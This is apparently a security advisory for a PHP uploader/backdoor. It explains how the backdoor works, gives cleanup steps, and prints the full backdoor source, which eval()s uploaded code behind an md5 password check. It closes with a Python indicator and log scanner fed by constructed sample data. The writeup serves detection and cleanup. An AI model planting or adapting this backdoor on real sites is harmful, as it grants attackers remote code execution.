This malware uses the $HTTP_POST_FILES variable to receive both a file to store on the server (it works as an uploader) and PHP code to execute (it works as a backdoor). It is more complex than a typical backdoor that passes its payload in an ordinary POST body: the client has to send a request with Content-Type: multipart/form-data; and format the body exactly like a normal browser file upload, e.g. Content-Disposition: form-data; name="f"; filename="f.txt". The password is sent in the plain POST field "p" and compared as md5($_POST["p"]) against the hard-coded hash in PASSWD. Two upload fields are then handled differently: the file in field "s" is written to the directory containing the backdoor under its original basename (the uploader part), while the contents of the file in field "f" are passed straight to eval() without ever being saved (the backdoor part). The eval() on the "s" branch is commented out in this sample. Each stage echoes md5("mark_<stage>") (start, pass, save_ok, save_fail, ok, fail, end) inside a <pre> block, so the operator can tell from the response which branch ran. Note that $HTTP_POST_FILES is one of the long arrays removed in PHP 5.4, so on current PHP versions the file reads fail silently (the @ operator suppresses the warnings) and the response shows the save_fail/fail markers, although the password check via $_POST still works.
Affecting
Most PHP sites. We observed a few attacks that specifically targeted WordPress and Joomla sites. The backdoor files usually had names of legitimate files with short prefixes such as "fix" or "co" added to the front.
Cleanup
Cleanup is done by deleting the malicious file, which can be found in your system by searching your files for the dump code below; the hash in the PASSWD constant, the $HTTP_POST_FILES["f"]["tmp_name"] read feeding eval(), and the md5("mark_$t") marker function are all good search strings. Reviewing access logs for HTTP POST requests to PHP files that should never receive a POST (in particular files under upload or theme directories) can point out the infected files, and any file stored by the uploader half will be in the same directory as the backdoor.
Dump
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;
// md5 of the operator password; the plaintext is not in the file
define('PASSWD','249bae67d49ba2cd9cccca81ac3839cb');
function say($t) {
    echo "$t\n";
};
// emits md5("mark_<stage>") so the operator can read the outcome from the response
function testdata($t) {
    say(md5("mark_$t"));
};
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
    // uploader: field "s" is written next to this file under its original name
    if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
        if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
        {
            testdata('save_ok');
        };
        //eval($code);
    } else {
        testdata('save_fail');
    };
    // backdoor: field "f" is executed directly, never written to disk
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
    {
        eval($code);
        testdata('ok');
    } else {
        testdata('fail');
    };
} else {
    testdata('pass');
};
testdata('end');
echo "</pre>";
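The following scanner is an added example for the Cleanup section and is not part of the original signature or any product. It turns the indicators visible in the dump above into three checks: a source scan for the PASSWD hash, the $HTTP_POST_FILES read, the eval($code) call and the md5("mark_$t") marker function; a recomputation of the md5("mark_...") response markers so captured HTTP responses can be matched; and a pass over access-log lines that counts POST requests to PHP files outside a small allowlist of handlers that legitimately receive POSTs. The allowlist, the log format (Apache combined) and the sample PHP fragment and log lines embedded below are all constructed assumptions for illustration.

```python
"""Indicator scan for the HTTP_POST_FILES uploader/backdoor (added example, not the original dump)."""
import hashlib
import re
from collections import Counter

# Indicators taken from the dump: the hard-coded password hash, the
# HTTP_POST_FILES read that feeds eval(), and the md5("mark_...") marker helper.
PASSWD_HASH = "249bae67d49ba2cd9cccca81ac3839cb"
FILE_INDICATORS = [
    re.compile(r"""define\(\s*['"]PASSWD['"]\s*,\s*['"]""" + PASSWD_HASH),
    re.compile(r"""\$HTTP_POST_FILES\s*\[\s*['"]\w+['"]\s*\]\s*\[\s*['"]tmp_name['"]"""),
    re.compile(r"""\beval\s*\(\s*\$code\s*\)"""),
    re.compile(r"""md5\(\s*['"]mark_\$t['"]"""),
]

# Stage names the backdoor echoes as md5("mark_<stage>") inside <pre>...</pre>.
STAGES = ("start", "pass", "save_ok", "save_fail", "ok", "fail", "end")


def scan_php_source(src):
    """Return the number of distinct file indicators found in one PHP file's text."""
    return sum(1 for rx in FILE_INDICATORS if rx.search(src))


def response_markers():
    """Recompute the md5("mark_<stage>") strings the backdoor prints, keyed by stage."""
    return {s: hashlib.md5(f"mark_{s}".encode()).hexdigest() for s in STAGES}


def backdoor_response_stages(body):
    """Map a captured response body to the stages it reports (empty list if none match)."""
    markers = response_markers()
    return [s for s in STAGES if markers[s] in body]


# Apache combined log format (assumption: adjust the regex for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# PHP endpoints that legitimately receive POSTs on a WordPress site (assumed allowlist).
EXPECTED_POST_TARGETS = {"/wp-login.php", "/xmlrpc.php", "/wp-admin/admin-ajax.php"}


def suspicious_posts(log_lines):
    """Count POSTs to .php paths outside the allowlist, keyed by (client ip, path)."""
    hits = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if path.endswith(".php") and path not in EXPECTED_POST_TARGETS:
            hits[(m["ip"], path)] += 1
    return hits


# Constructed sample input: a fragment assembled from the dump's own lines, and
# four fabricated combined-log lines (two POSTs to a prefixed copy of index.php).
SAMPLE_PHP = r"""
define('PASSWD','249bae67d49ba2cd9cccca81ac3839cb');
function testdata($t) {
say(md5("mark_$t"));
};
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
$HTTP_POST_FILES["f"]["size"]))
{
eval($code);
"""
CLEAN_PHP = '<?php echo "hello"; ?>'
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2013:13:55:36 +0000] "POST /wp-content/uploads/fixindex.php HTTP/1.1" 200 231 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2013:13:56:01 +0000] "POST /wp-content/uploads/fixindex.php HTTP/1.1" 200 198 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2013:14:02:11 +0000] "GET /index.php?p=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2013:14:03:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print("indicators in sample:", scan_php_source(SAMPLE_PHP))
    print("indicators in clean file:", scan_php_source(CLEAN_PHP))
    for (ip, path), n in suspicious_posts(SAMPLE_LOG.splitlines()).items():
        print(f"{n:3d} POST(s) from {ip} to {path}")
    for stage, digest in response_markers().items():
        print(f"grep responses for {digest}  (mark_{stage})")
```

A file that matches two or more of the source indicators should be opened and compared with the dump; the log pass is only a triage aid, so extend the allowlist with any form handlers your own site uses before trusting its output.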